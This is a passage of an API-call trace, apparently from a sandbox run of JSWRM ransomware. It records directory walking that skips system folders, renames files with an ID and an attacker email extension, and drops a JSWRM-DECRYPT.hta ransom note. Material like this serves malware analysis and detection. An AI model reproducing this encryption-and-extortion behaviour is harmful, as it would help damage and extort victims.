ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipssve.xml", cAlternateFileName="")) returned 1 [0068.505] lstrcmpiW (lpString1="ipssve.xml", lpString2=".") returned 1 [0068.505] lstrcmpiW (lpString1="ipssve.xml", lpString2="..") returned 1 [0068.505] lstrcmpiW (lpString1="ipssve.xml", lpString2="...") returned 1 [0068.506] lstrcmpiW (lpString1="ipssve.xml", lpString2="windows") returned -1 [0068.506] lstrcmpiW (lpString1="ipssve.xml", lpString2="recovery") returned -1 [0068.506] lstrcmpiW (lpString1="ipssve.xml", lpString2="perflogs") returned -1 [0068.506] lstrcmpiW (lpString1="ipssve.xml", lpString2="documents and settings") returned 1 [0068.506] lstrcmpiW (lpString1="ipssve.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.506] lstrcmpiW (lpString1="ipssve.xml", lpString2="system volume information") returned -1 [0068.506] lstrcmpiW (lpString1="ipssve.xml", lpString2="msocache") returned -1 [0068.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssve.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssve.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipssve.xml", lpUsedDefaultChar=0x0) returned 10 [0068.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssve.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipssve.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipssve.xml", lpUsedDefaultChar=0x0) returned 10 [0068.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.507] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9666253398625208) returned 0 [0068.507] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.507] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.507] CloseHandle (hObject=0xffffffff) returned 1 [0068.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0068.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0068.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.508] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaa0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipstr.xml", cAlternateFileName="")) returned 1 [0068.508] lstrcmpiW (lpString1="ipstr.xml", lpString2=".") returned 1 [0068.508] lstrcmpiW (lpString1="ipstr.xml", lpString2="..") returned 1 [0068.508] lstrcmpiW (lpString1="ipstr.xml", lpString2="...") returned 1 [0068.508] lstrcmpiW (lpString1="ipstr.xml", lpString2="windows") returned -1 [0068.508] lstrcmpiW (lpString1="ipstr.xml", lpString2="recovery") returned -1 [0068.508] lstrcmpiW (lpString1="ipstr.xml", lpString2="perflogs") returned -1 [0068.508] lstrcmpiW (lpString1="ipstr.xml", lpString2="documents and settings") returned 1 [0068.508] lstrcmpiW (lpString1="ipstr.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.508] lstrcmpiW (lpString1="ipstr.xml", lpString2="system volume information") returned -1 [0068.508] lstrcmpiW (lpString1="ipstr.xml", lpString2="msocache") returned -1 [0068.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0068.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipstr.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipstr.xml", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipstr.xml", lpUsedDefaultChar=0x0) returned 9 [0068.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0068.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipstr.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipstr.xml", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipstr.xml", lpUsedDefaultChar=0x0) returned 9 [0068.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.508] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.508] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9665085167522464) returned 0 [0068.508] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.509] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.509] CloseHandle (hObject=0xffffffff) returned 1 [0068.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0068.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0068.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.509] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.509] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0769b1e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="it-IT", cAlternateFileName="")) returned 1 [0068.509] lstrcmpiW (lpString1="it-IT", lpString2=".") returned 1 [0068.509] lstrcmpiW (lpString1="it-IT", lpString2="..") returned 1 [0068.509] lstrcmpiW (lpString1="it-IT", lpString2="...") returned 1 [0068.509] lstrcmpiW (lpString1="it-IT", lpString2="windows") returned -1 [0068.509] lstrcmpiW (lpString1="it-IT", lpString2="recovery") returned -1 [0068.509] lstrcmpiW (lpString1="it-IT", lpString2="perflogs") returned -1 [0068.509] lstrcmpiW (lpString1="it-IT", lpString2="documents and settings") returned 1 [0068.509] lstrcmpiW (lpString1="it-IT", lpString2="$RECYCLE.BIN") returned 1 [0068.509] lstrcmpiW (lpString1="it-IT", lpString2="system volume information") returned -1 [0068.510] lstrcmpiW (lpString1="it-IT", lpString2="msocache") returned -1 [0068.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\jswrm-decrypt.hta")) returned 0xffffffff [0068.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.511] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.511] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.512] CloseHandle (hObject=0x454) returned 1 [0068.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\jswrm-decrypt.hta")) returned 0x20 [0068.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.514] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0769b1e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f7f105a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0068.514] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.514] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0769b1e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f7f105a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.515] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.515] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.515] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f7f105a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f7f105a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f7f105a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.515] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9592f9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e9592f9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e9592f9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, 